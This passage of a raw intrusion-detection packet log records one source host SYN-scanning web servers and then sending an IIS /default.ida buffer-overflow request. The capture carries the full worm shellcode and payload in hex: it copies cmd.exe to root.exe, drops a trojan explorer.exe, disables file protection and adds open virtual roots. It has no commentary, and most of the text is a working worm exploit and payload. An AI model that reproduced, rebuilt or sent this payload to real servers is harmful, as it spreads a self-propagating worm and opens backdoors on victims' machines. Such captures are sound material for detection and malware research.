1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:36.892884 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2361 -> 137.189.97.170:80 TCP TTL:122 TOS:0x0 ID:30841 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8B2255B8 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:38.958128 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2440 -> 137.189.97.215:80 TCP TTL:122 TOS:0x0 ID:31049 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8B65DAE0 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:41.278428 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2785 -> 137.189.97.166:80 TCP TTL:122 TOS:0x0 ID:31314 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8C8EDD29 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:44.069401 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2785 -> 137.189.97.166:80 TCP TTL:122 TOS:0x0 ID:31578 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8C8EDD29 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:46.723320 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:31853 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8D25FC04 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:49.162692 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2785 -> 137.189.97.166:80 TCP TTL:122 TOS:0x0 ID:32125 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8C8EDD29 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:49.227576 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3054 -> 137.189.98.184:80 TCP TTL:122 TOS:0x0 ID:32134 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8D77AE5A Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:49.264765 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32140 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8D25FC04 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:51.518544 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3054 -> 137.189.98.184:80 TCP TTL:122 TOS:0x0 ID:32392 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8D77AE5A Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:53.759427 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32642 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8D25FC04 Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:54.788136 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32729 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x8D25FC05 Ack: 0x16C763B Win: 0x2238 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:55.082333 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32731 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x8D25FC05 Ack: 0x16C763B Win: 0x2238 TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0... 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0...... 00 00 00 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 8B 1C 24 ..._________...$ FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p.... 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U. FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,... 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,............. 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u..... 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T.... 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U. 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s... 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p.. FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d.. 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U. 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f.. FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h.. FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........ 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d. FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`.. FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1.. 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h.... 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j. 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U.. 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w. C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu.... F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg.. 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.& 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..< 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu.. 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........ 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg... 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E.. 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u.. 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E. E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID. FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E...... 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U. 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA 74 6F 6D 41 tomA =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:55.393957 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x5EA 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32732 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x8D2601B9 Ack: 0x16C763B Win: 0x2238 TcpLen: 20 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_ 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E. E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U.. 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E.... 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E..... 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E.. 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U.. 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E..... 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E..... 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx.. 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i... 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4.... C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t. C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................ E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................ E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ...... FF FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................ FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y.. 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........ 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t.. 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U.. BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\ 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe.. 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U... 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP......... FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@... 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%)......... 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................ 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ... 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@.............. 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@... 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................ 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ............... 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0... 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................ 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`.. 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... .... 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@............. 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............ 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@..... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @.. 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @.. 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2... 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@....... 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h.... E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5. 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@... 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........ 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h. 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@ 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@.. C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217.... 40 00 89 35 @..5 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:57.490513 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3054 -> 137.189.98.184:80 TCP TTL:122 TOS:0x0 ID:32906 IpLen:20 DgmLen:48 DF ******S* Seq: 0x8D77AE5A Ack: 0x0 Win: 0x2238 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:57.844740 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3B8 202.140.112.30:2955 -> 137.189.98.79:80 TCP TTL:122 TOS:0x0 ID:32922 IpLen:20 DgmLen:938 DF ***AP*** Seq: 0x8D26076D Ack: 0x16C763B Win: 0x2238 TcpLen: 20 D0 24 40 00 FF 35 D0 24 40 00 68 D0 20 40 00 6A .$@..5.$@.h. @.j 01 6A 00 55 FF 35 D8 24 40 00 E8 19 00 00 00 C3 .j.U.5.$@....... FF 25 60 30 40 00 FF 25 64 30 40 00 FF 25 68 30 .%`0@..%d0@..%h0 40 00 FF 25 70 30 40 00 FF 25 74 30 40 00 FF 25 @..%p0@..%t0@..% 78 30 40 00 FF 25 7C 30 40 FC FC FC FC FC FC FC x0@..%|0@....... FC FC FC FC FC FC FC FC FC FC FC FC 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 5C 45 58 50 4C 4F 52 .........\EXPLOR 45 52 2E 45 58 45 00 00 00 53 4F 46 54 57 41 52 ER.EXE...SOFTWAR 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 E\Microsoft\Wind 6F 77 73 20 4E 54 5C 43 75 72 72 65 6E 74 56 65 ows NT\CurrentVe 72 73 69 6F 6E 5C 57 69 6E 6C 6F 67 6F 6E 00 00 rsion\Winlogon.. 00 53 46 43 44 69 73 61 62 6C 65 00 00 9D FF FF .SFCDisable..... FF 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 .SYSTEM\CurrentC 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 ontrolSet\Servic 65 73 5C 57 33 53 56 43 5C 50 61 72 61 6D 65 74 es\W3SVC\Paramet 65 72 73 5C 56 69 72 74 75 61 6C 20 52 6F 6F 74 ers\Virtual Root 73 00 00 00 00 2F 53 63 72 69 70 74 73 00 00 00 s..../Scripts... 00 2F 4D 53 41 44 43 00 00 2F 43 00 00 2F 44 00 ./MSADC../C../D. 00 63 3A 5C 2C 2C 32 31 37 00 00 00 00 64 3A 5C .c:\,,217....d:\ 2C 2C 32 31 37 FC FC FC FC FC FC FC FC FC FC FC ,,217........... FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 3C 30 00 00 00 00 00 00 00 00 00 00 84 30 ..<0...........0 00 00 60 30 00 00 4C 30 00 00 00 00 00 00 00 00 ..`0..L0........ 00 00 91 30 00 00 70 30 00 00 00 00 00 00 00 00 ...0..p0........ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9E 30 ...............0 00 00 A6 30 00 00 BE 30 00 00 00 00 00 00 C8 30 ...0...0.......0 00 00 DC 30 00 00 EE 30 00 00 FE 30 00 00 00 00 ...0...0...0.... 00 00 9E 30 00 00 A6 30 00 00 BE 30 00 00 00 00 ...0...0...0.... 00 00 C8 30 00 00 DC 30 00 00 EE 30 00 00 FE 30 ...0...0...0...0 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 ......KERNEL32.d 6C 6C 00 41 44 56 41 50 49 33 32 2E 64 6C 6C 00 ll.ADVAPI32.dll. 00 00 53 6C 65 65 70 00 00 00 47 65 74 57 69 6E ..Sleep...GetWin 64 6F 77 73 44 69 72 65 63 74 6F 72 79 41 00 00 dowsDirectoryA.. 00 00 57 69 6E 45 78 65 63 00 00 00 52 65 67 51 ..WinExec...RegQ 75 65 72 79 56 61 6C 75 65 45 78 41 00 00 00 00 ueryValueExA.... 52 65 67 53 65 74 56 61 6C 75 65 45 78 41 00 00 RegSetValueExA.. 00 00 52 65 67 4F 70 65 6E 4B 65 79 45 78 41 00 ..RegOpenKeyExA. 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 FC FC FC ..RegCloseKey... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 5E BF B9 05 00 00 6A .........^.....j 07 E8 10 00 00 00 64 3A 5C 65 78 70 6C 6F 72 65 ......d:\explore 72 2E 65 78 65 00 8B 04 24 88 18 FF 55 CC 83 F8 r.exe...$...U... FF 74 4D 89 85 4C FE FF FF AC 8A F8 38 3E 75 27 .tM..L......8>u' 6A 20 E8 23 00 00 00 00 00 00 00 00 00 00 00 00 j .#............ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 6A 01 56 FF B5 4C FE FF FF .......j.V..L... FF 55 C8 46 4F 75 C5 FF B5 4C FE FF FF FF 55 C4 .U.FOu...L....U. FE C3 80 FB 64 0F 86 4C F9 FF FF C3 61 C9 C2 04 ....d..L....a... 00 90 .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-22:26:58.073005 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3E 202.140.112.30:3322 